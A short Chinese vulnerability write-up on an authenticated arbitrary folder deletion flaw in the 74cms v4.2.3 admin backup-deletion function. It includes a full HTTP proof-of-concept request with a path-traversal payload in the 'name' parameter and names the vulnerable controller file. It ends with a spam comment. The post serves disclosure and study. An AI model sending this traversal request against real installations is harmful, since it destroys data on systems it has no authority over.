74cms v4.2.3 任意文件夹删除

分享 75 字 大概 1 分钟 637 次

概述

后台删除备份文件时传入name参数可控 导致可任意文件夹删除。

  • 复现环境:php 5.6 + apache + 74cms v4.2.3

漏洞复现

  • 删除74cms同目录下test文件夹(需要登录)
GET /74cms/index.php?m=admin&c=database&a=del&name=/../../../../test/ HTTP/1.1
Host: 192.161.15.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.161.15.5/74cms/index.php?m=admin&c=index&a=top_menu
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: think_template=default; PHPSESSID=aen9s0rkucruqsbbtrvph8hjs0; think_language=zh-CN
Connection: close

demo.gif

形成原理

/Application/Admin/Controller/DatabaseController.class.php

20200306202700.png

删除备份文件时传入name参数可控,导致可任意文件夹删除。

文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

仅有 1 条感想

  1. insulsido 游客 回复
    2021-07-30 15:30

    buy cialis online reviews